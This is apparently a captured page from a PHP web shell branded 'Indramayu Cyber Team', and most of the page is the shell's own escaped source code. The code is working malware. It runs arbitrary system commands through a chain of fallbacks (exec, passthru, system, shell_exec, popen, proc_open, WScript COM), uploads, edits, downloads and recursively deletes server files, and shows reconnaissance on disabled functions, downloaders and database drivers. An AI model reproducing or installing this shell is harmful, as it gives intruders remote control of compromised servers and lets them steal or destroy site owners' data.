	$r = &quot;&quot;;
	for ($i = 0; $i < $func[55]($str); $i++) {
		$r .= dechex(ord($str[$i]));
	}
	return $r;
}

function dehex($str) {
	$r = &quot;&quot;;
	$len = (strlen($str) - 1);
	for ($i = 0; $i < $len; $i += 2) {
		$r .= chr(hexdec($str[$i].$str[$i + 1]));
	}
	return $r;
}

function formatSize($bytes) {
	$types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
	for ( $i = 0; $bytes >= 1024 &amp;&amp; $i < ( count( $types ) - 1 ); $bytes /= 1024, $i++ );
	return( round( $bytes, 2 ).&quot; &quot;.$types[$i] );
}

function perms($file) {
	global $func;
	$perms = fileperms($file);
	if (($perms &amp; 0xC000) == 0xC000){
		$info = 's';
	}elseif (($perms &amp; 0xA000) == 0xA000){
		$info = 'l';
	}elseif (($perms &amp; 0x8000) == 0x8000){
		$info = '-';
	}elseif (($perms &amp; 0x6000) == 0x6000){
		$info = 'b';
	}elseif (($perms &amp; 0x4000) == 0x4000){
		$info = 'd';
	}elseif (($perms &amp; 0x2000) == 0x2000){
		$info = 'c';
	}elseif (($perms &amp; 0x1000) == 0x1000){
	$info = 'p';
	}else{
		$info = 'u';
	}
	$info .= (($perms &amp; 0x0100) ? 'r' : '-');
	$info .= (($perms &amp; 0x0080) ? 'w' : '-');
	$info .= (($perms &amp; 0x0040) ?
	(($perms &amp; 0x0800) ? 's' : 'x' ) :
	(($perms &amp; 0x0800) ? 'S' : '-'));
	$info .= (($perms &amp; 0x0020) ? 'r' : '-');
	$info .= (($perms &amp; 0x0010) ? 'w' : '-');
	$info .= (($perms &amp; 0x0008) ?
	(($perms &amp; 0x0400) ? 's' : 'x' ) :
	(($perms &amp; 0x0400) ? 'S' : '-'));
	$info .= (($perms &amp; 0x0004) ? 'r' : '-');
	$info .= (($perms &amp; 0x0002) ? 'w' : '-');
	$info .= (($perms &amp; 0x0001) ?
	(($perms &amp; 0x0200) ? 't' : 'x' ) :
	(($perms &amp; 0x0200) ? 'T' : '-'));
	return $func[41](sprintf('%o', $perms), -4) . ' >> ' .$info;
}

function exe($in) {
	global $func;
	$out = '';
	try {
		if ($func[49]('exec')) {
			@$func[23]($in, $out);
			$out = @join(&quot;\n&quot;, $out);
		} elseif ($func[49]('passthru')) {
			$func[48]();
			@passthru($in);
			$out = $func[27]();
		} elseif($func[49]('system')) {
			$func[48]();
			@system($in);
			$out = $func[27]();
		} elseif ($func[49]('shell_exec')) {
			$out = $func[25]($in);
		} elseif ($func[49](&quot;popen&quot;) &amp;&amp; $func[49](&quot;pclose&quot;)) {
			if (is_resource($f = @popen($in,&quot;r&quot;))) {
				$out = &quot;&quot;;
				while(!@feof($f))
				$out .= fread($f, 1024);
				pclose($f);
			}
		} elseif ($func[49]('proc_open')) {
			$pipes = [];
			$process = @proc_open($in.' 2>&amp;1', array(array(&quot;pipe&quot;,&quot;w&quot;), array(&quot;pipe&quot;,&quot;w&quot;), array(&quot;pipe&quot;,&quot;w&quot;)), $pipes, null);
			$out = @stream_get_contents($pipes[1]);
		} elseif (class_exists('COM')) {
			$ws = new COM('WScript.shell');
			$exec = $ws->exec('cmd.exe /c '.$in);
			$stdout = $exec->StdOut();
			$out = $stdout->ReadAll();
		}
	} catch(Exception $e) {}
	return $out;
}

function checkName($name) {
	global $func;
	if ($func[55]($name) > 18) {
		return $func[41]($name, 0, 18) . &quot;...&quot;;
	}
	return $name;
}

function checkPerm($dir, $perm) {
	global $func;
	$perm = explode('>>', $perm);
	if ($func[8]($dir)) {
		return &quot;<font class='text-success'>&quot;.$perm[0].&quot;</font> >> <font class='text-success'>&quot;.$perm[1].&quot;</font>&quot;;
	} elseif (!$func[9]($dir)) {
		return &quot;<font class='text-danger'>&quot;.$perm[0].&quot;</font> >> <font class='text-danger'>&quot;.$perm[1].&quot;</font>&quot;;
	} else {
		return &quot;<font class='text-secondary'>&quot;.$perm[0].&quot;</font> >> <font class='text-secondary'>&quot;.$perm[1].&quot;</font>&quot;;
	}
}

function getowner($item) {
	global $func;
	if ($func[49](&quot;posix_getpwuid&quot;)) {
		$downer = @$func[33](fileowner($item));
		$downer = $downer['name'];
	} else {
		$downer = fileowner($item);
	}
	if ($func[49](&quot;posix_getgrgid&quot;)) {
		$dgrp = @$func[34](filegroup($item));
		$dgrp = $dgrp['name'];
	} else {
		$dgrp = filegroup($item);
	}
	return $downer . '/' . $dgrp;
}

function geticon($file) {
	global $func;
	$ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
	if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
		return 'file-code';
	} else if ($ext == 'pdf') {
		return 'file-pdf';
	} else if ($ext == 'txt') {
		return 'file-alt';
	} else if ($ext == 'csv') {
		return 'file-csv';
	} else if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
		return 'file-image';
	} else if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
		return 'file-video';
	} else if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
		return 'file-word';
	} else if ($ext == 'ppt' || $ext == 'pptx') {
		return 'file-powerpoint';
	} else if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
		return 'file-excel';
	} else if ($ext == 'mp3' || $ext == 'wav') {
		return 'file-audio';
	} else if ($ext == 'sql' || $ext == 'db') {
		return 'database';
	} else if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
		return 'file-archive';
	} else {
		return 'file';
	}
}

function which($p) {
	global $func;
	$path = exe('which ' . $p);
	if (!empty($path)) {
		return $func[55]($path);
	}
	return false;
}

function flash($message, $status, $class, $redirect = false) {
	if (!empty($_SESSION[&quot;message&quot;])) {
		unset($_SESSION[&quot;message&quot;]);
	}
	if (!empty($_SESSION[&quot;class&quot;])) {
		unset($_SESSION[&quot;class&quot;]);
	}
	if (!empty($_SESSION[&quot;status&quot;])) {
		unset($_SESSION[&quot;status&quot;]);
	}
	$_SESSION[&quot;message&quot;] = $message;
	$_SESSION[&quot;class&quot;] = $class;
	$_SESSION[&quot;status&quot;] = $status;
	if ($redirect) {
		header('Location: ' . $redirect);
		exit();
	}
	return true;
}

function clear() {
	if (!empty($_SESSION[&quot;message&quot;])) {
		unset($_SESSION[&quot;message&quot;]);
	}
	if (!empty($_SESSION[&quot;class&quot;])) {
		unset($_SESSION[&quot;class&quot;]);
	}
	if (!empty($_SESSION[&quot;status&quot;])) {
		unset($_SESSION[&quot;status&quot;]);
	}
	return true;
}

function deleter($d) {
	global $func;
	if (trim($func[35]($d, PATHINFO_BASENAME), '.') === '') {
		return false;
	};
	if ($func[6]($d)) {
		array_map(&quot;deleter&quot;, glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		rmdir($d);
		return true;
	} else {
		unlink($d);
		return true;
	}
	return false;
}

$scandir = $func[21]($dir);

?>
<!doctype html>
<html lang=&quot;en&quot;>
<head>
	<meta charset=&quot;utf-8&quot;>
	<meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;>
	<link href=&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css&quot; rel=&quot;stylesheet&quot; integrity=&quot;sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x&quot; crossorigin=&quot;anonymous&quot;>
	<link rel=&quot;stylesheet&quot; href=&quot;https://pro.fontawesome.com/releases/v5.10.0/css/all.css&quot; integrity=&quot;sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p&quot; crossorigin=&quot;anonymous&quot;/>
	<title><?= $shellName ?></title>
</head>
<body>
	<div class=&quot;container-lg&quot;>
		
		<nav class=&quot;navbar navbar-light bg-light&quot;>
			<div class=&quot;container-fluid&quot;>
				<a class=&quot;navbar-brand&quot; href=&quot;?&quot;>
					<img src=&quot;<?= $logo ?>&quot; alt=&quot;logo&quot; width=&quot;30&quot; height=&quot;24&quot; class=&quot;d-inline-block align-text-top&quot;>
					<?= $shellName ?>
				</a>
			</div>
		</nav>
		
		<?php if (isset($_SESSION['message'])) : ?>
		<div class=&quot;alert alert-<?= $_SESSION['class'] ?> alert-dismissible fade show my-3&quot; role=&quot;alert&quot;>
			<strong><?= $_SESSION['status'] ?>!</strong> <?= $_SESSION['message'] ?>
			<button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;alert&quot; aria-label=&quot;Close&quot;></button>
		</div>
		<?php endif; clear(); ?>

		<div id=&quot;tool&quot;>
			<div class=&quot;d-flex justify-content-center flex-wrap my-3&quot;>
				<a href=&quot;?&quot; class=&quot;m-1 btn btn-outline-dark btn-sm&quot;><i class=&quot;fa fa-home&quot;></i> Home</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#upload&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-upload&quot;></i> Upload</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#newfile&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-file-plus&quot;></i> New File</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#newfolder&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-folder-plus&quot;></i> New Folder</a>
			</div>
			
			<div class=&quot;row&quot;>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;upload&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								 <div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;>
										<div class=&quot;input-group&quot;>
											<input type=&quot;file&quot; class=&quot;form-control&quot; name=&quot;uploadfile[]&quot; id=&quot;inputGroupFile04&quot; aria-describedby=&quot;inputGroupFileAddon04&quot; aria-label=&quot;Upload&quot;>
											<button class=&quot;btn btn-outline-dark&quot; type=&quot;submit&quot; id=&quot;inputGroupFileAddon04&quot;>Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;newfile&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								<div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot;>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>File Name</label>
											<input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;filename&quot; placeholder=&quot;./sToryAn9el.txt&quot;>
										</div>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>File Content</label>
											<textarea class=&quot;form-control&quot; rows=&quot;5&quot; name=&quot;filecontent&quot;></textarea>
										</div>
										<button type=&quot;submit&quot; class=&quot;btn btn-outline-dark&quot;>Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;newfolder&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								<div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot;>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>Folder Name</label>
											<input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;foldername&quot; placeholder=&quot;./sToryAn9el&quot;>
										</div>
										<button type=&quot;submit&quot; class=&quot;btn btn-outline-dark&quot;>Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class=&quot;row&quot;>
			<div class=&quot;col-md-12&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-server&quot;></i> Server Information </h5>
						<div class=&quot;table-responsive&quot;>
							<table class=&quot;table table-hover text-nowrap&quot;>
								<tr>
									<td>Operating System</td>
									<td> : <?= $uname ?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?= $uid ?>[<?= $user ?>] / <?= $gid ?>[<?= $group ?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?= $func[1]() ?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?= (!@$_SERVER[&quot;SERVER_ADDR&quot;] ? ($func[49](&quot;gethostbyname&quot;) ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER[&quot;SERVER_ADDR&quot;]) ?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class=&quot;d-flex&quot;>: Total = <?= formatSize($total) ?>, Free = <?= formatSize($free) ?> [<?= $pers ?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?= $dom ?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?= $_SERVER['SERVER_SOFTWARE'] ?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?= $show_ds ?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?= rtrim($useful, ', ') ?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?= rtrim($downloader, ', ') ?></td>
								</tr>
								<tr>
									<td colspan=&quot;2&quot;>CURL : <?= $func[49]('curl_version') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | SSH2 : <?= $func[49]('ssh2_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Magic Quotes : <?= $func[49]('get_magic_quotes_gpc') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | MySQL : <?= $func[49]('mysql_get_client_info') || class_exists('mysqli') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | MSSQL : <?= $func[49]('mssql_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | PostgreSQL : <?= $func[49]('pg_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Oracle : <?= $func[49]('oci_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?></td>
								</tr>
								<tr>
									<td colspan=&quot;2&quot;>Safe Mode : <?= @$func[31]('safe_mode') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Open Basedir : <?= $open_b ?> | Safe Mode Exec Dir : <?= @$func[31]('safe_mode_exec_dir') ? '<font class=&quot;text-success&quot;>'. @$func[31]('safe_mode_exec_dir') .'</font>' : '<font class=&quot;text-warning&quot;>NONE</font>' ?> | Safe Mode Include Dir : <?= @$func[31]('safe_mode_include_dir') ? '<font class=&quot;text-success&quot;>'. @$func[31]('safe_mode_include_dir') .'</font>' : '<font class=&quot;text-warning&quot;>NONE</font>' ?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12 my-3&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-wave-square&quot;></i> Path </h5>
						<nav aria-label=&quot;breadcrumb&quot; style=&quot;--bs-breadcrumb-divider: '>';&quot;>
							<ol class=&quot;breadcrumb&quot;>
								<?php
									$numDir = count($scdir);
									foreach ($scdir as $id => $pat) {
										if ($pat == '' &amp;&amp; $id == 0) {
											echo '<li class=&quot;breadcrumb-item&quot;><a class=&quot;text-decoration-none text-dark&quot; href=&quot;?dir=/&quot;>/</a></li>';
											continue;
										}
										if ($pat == '') continue;
										if ($id + 1 == $numDir) {
											echo '<li class=&quot;breadcrumb-item active&quot; aria-current=&quot;page&quot;>'.$pat.'</li>';
										} else {
											echo '<li class=&quot;breadcrumb-item&quot;><a class=&quot;text-decoration-none text-dark&quot; href=&quot;?dir=';
											for ($i = 0; $i <= $id; $i++) {
												echo &quot;$scdir[$i]&quot;;
												if ($i != $id) echo &quot;/&quot;;
											}
											echo '&quot;>'.$pat.'</a></li>';
										}
									}
								?>
							</ol>
						</nav>
						[ <?= checkPerm($dir, perms($dir)) ?> ]
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12&quot; id=&quot;main&quot;>
				<div class=&quot;card border-dark overflow-auto&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-<?= $icon ?>&quot;></i> <?= $title ?></h5>
						<?php if ($do == 'view') : ?>
							<h1>Anjing</h1>
						<?php else: ?>
							<?php if ($func[9]($dir)) : ?>
								<div class=&quot;table-responsive&quot;>
									<table class=&quot;table table-hover text-nowrap&quot;>
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php
												foreach ($scandir as $item) :
													if (!$func[6]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td>
														<?php if ($item === '..') : ?>
														<a href=&quot;?dir=<?= $func[28]($dir); ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder-open&quot;></i> <?= $item ?></a>
														<?php elseif ($item === '.') :  ?>
														<a href=&quot;?dir=<?= $dir; ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder-open&quot;></i> <?= $item ?></a>
														<?php else : ?>
														<a href=&quot;?dir=<?= $dir . '/' . $item ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder&quot;></i> <?= checkName($item); ?></a>
														<?php endif; ?>
													</td>
													<td><?= $func[38]($item) ?></td>
													<td class=&quot;align-middle&quot;>--</td>
													<td><?= $func[19](&quot;Y-m-d h:i:s&quot;, $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; <?= $item === &quot;..&quot; || $item === &quot;.&quot; ? '' : 'data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#renameModal&quot; data-bs-name=&quot;'.$item.'&quot;' ?>><i class=&quot;fa fa-edit&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; <?= $item === &quot;..&quot; || $item === &quot;.&quot; ? '' : 'data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#deleteModal&quot; data-bs-file=&quot;'.$dir . '/' . $item.'&quot;'?>><i class=&quot;fa fa-trash-alt&quot;></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
											<?php
												foreach ($scandir as $item) :
													if (!$func[7]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td><a data-bs-toggle=&quot;modal&quot; href=&quot;#viewModal&quot; role=&quot;button&quot; data-bs-name=&quot;<?= $item ?>&quot; data-bs-content=&quot;<?= $func[18](@$func[14]($item)) ?>&quot; class=&quot;text-dark text-decoration-none&quot;><i class=&quot;fa fa-<?= geticon($item) ?>&quot;></i> <?= checkName($item); ?></a></td>
													<td><?= checkName(($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item))) ?></td>
													<td><?= formatSize($func[10]($item)) ?></td>
													<td><?= $func[19](&quot;Y-m-d h:i:s&quot;, $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#renameModal&quot; data-bs-name=&quot;<?= $item ?>&quot;><i class=&quot;fa fa-edit&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#viewModal&quot; data-bs-name=&quot;<?= $item ?>&quot; data-bs-content=&quot;<?= $func[18](@$func[14]($item)) ?>&quot;><i class=&quot;fa fa-file-signature&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#downloadModal&quot; data-bs-file=&quot;<?= $dir . '/' . $item ?>&quot;><i class=&quot;fa fa-download&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#deleteModal&quot; data-bs-file=&quot;<?= $dir . '/' . $item ?>&quot;><i class=&quot;fa fa-trash-alt&quot;></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
										</tbody>
									</table>
								</div>
							<?php else: ?>
								<font class=&quot;text-danger&quot;>Can't read this directory!</font>
							<?php endif; ?>
						<?php endif; ?>
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12 my-3&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						Copyright © <a href=&quot;https://imcyber-team.blogspot.com/&quot;><font size=&quot;1&quot;><b>INDRAMAYU CYBER TEAM</b></font></a> <span class=&quot;float-end&quot;>Coded by <span class=&quot;text-muted&quot;>./sTory An9el </span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;renameModal&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot; aria-labelledby=&quot;renameModalLabel&quot; aria-hidden=&quot;true&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;renameModalLabel&quot;>Rename</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <form method=&quot;post&quot; id=&quot;rename-form&quot;>
		      <div class=&quot;modal-body&quot;>
		          <div class=&quot;mb-3&quot;>
		            <label for=&quot;newname&quot; class=&quot;col-form-label&quot;>New Name:</label>
		            <input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;newname&quot; id=&quot;newname&quot;>
		          </div>
		      </div>
		      <div class=&quot;modal-footer&quot;>
		        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
		        <button type=&quot;submit&quot; class=&quot;btn btn-primary&quot;>Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;deleteModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>Delete</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <div class=&quot;modal-body&quot;>
	        Are you sure want to delete this?
	      </div>
	      <div class=&quot;modal-footer&quot;>
	        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
	        <a href=&quot;&quot; class=&quot;btn btn-danger&quot; id=&quot;delete-confirm&quot;>Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;downloadModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>Download</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <div class=&quot;modal-body&quot;>
	        Are you sure want to download this?
	      </div>
	      <div class=&quot;modal-footer&quot;>
	        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
	        <a href=&quot;&quot; class=&quot;btn btn-danger&quot; id=&quot;download-confirm&quot;>Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class=&quot;modal fade&quot; id=&quot;viewModal&quot; aria-hidden=&quot;true&quot; aria-labelledby=&quot;deleteModalToggleLabel2&quot; data-bs-backdrop=&quot;static&quot; data-bs-keyboard=&quot;false&quot; tabindex=&quot;-1&quot;>
	  <div class=&quot;modal-dialog modal-dialog-centered&quot;>
	    <div class=&quot;modal-content&quot;>
	      <div class=&quot;modal-header&quot;>
	        <h5 class=&quot;modal-title&quot; id=&quot;exampleModalToggleLabel2&quot;>View</h5>
	        <button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;modal&quot; aria-label=&quot;Close&quot;></button>
	      </div>
	      <form action=&quot;&quot; method=&quot;post&quot;>
		      <div class=&quot;modal-body&quot;>
		        <div class=&quot;mb-3&quot;>
	            <label for=&quot;content&quot; class=&quot;col-form-label&quot;>Content:</label>
	            <textarea class=&quot;form-control&quot; id=&quot;content&quot; rows=&quot;15&quot; name=&quot;content&quot;></textarea>
	          </div>
		      </div>
		      <div class=&quot;modal-footer&quot;>
		        <button type=&quot;button&quot; class=&quot;btn btn-secondary&quot; data-bs-dismiss=&quot;modal&quot;>Close</button>
		        <button type=&quot;submit&quot; class=&quot;btn btn-primary&quot;>Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src=&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js&quot; integrity=&quot;sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4&quot; crossorigin=&quot;anonymous&quot;></script>
	<script src=&quot;https://code.jquery.com/jquery-3.6.0.min.js&quot; integrity=&quot;sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=&quot; crossorigin=&quot;anonymous&quot;></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var deleteModal = document.getElementById('deleteModal')
		var viewModal = document.getElementById('viewModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = &quot;hidden&quot;;
			hiddenInput.value = name;
			hiddenInput.name = &quot;oldname&quot;;
			document.getElementById(&quot;rename-form&quot;).appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&amp;do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = '?dir=' + file + '&amp;do=download'
		})
		
		viewModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var content = button.getAttribute('data-bs-content')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = viewModal.querySelector('.modal-title')
			var modalContent = viewModal.querySelector('.modal-body textarea')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = &quot;hidden&quot;;
			hiddenInput.value = name;
			hiddenInput.name = &quot;filename&quot;;
			viewModal.querySelector(&quot;form&quot;).appendChild(hiddenInput);

			modalTitle.textContent = 'Edit ' + name
			modalContent.value = content
		})
	</script>
</body>
</html>

" class="text-dark text-decoration-none"><i class="fa fa-file-code"></i> index.php</a></td>
													<td>text/x-php</td>
													<td>31.58 KB</td>
													<td>2023-02-13 10:45:26</td>
													<td>osboxes/osboxes</td>
													<td><font class="text-secondary">0664 </font> &gt;&gt; <font class="text-secondary"> -rw-rw-r--</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="index.php"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#viewModal" data-bs-name="index.php" data-bs-content="<?php

$shellName = 'Indramayu Cyber Team';
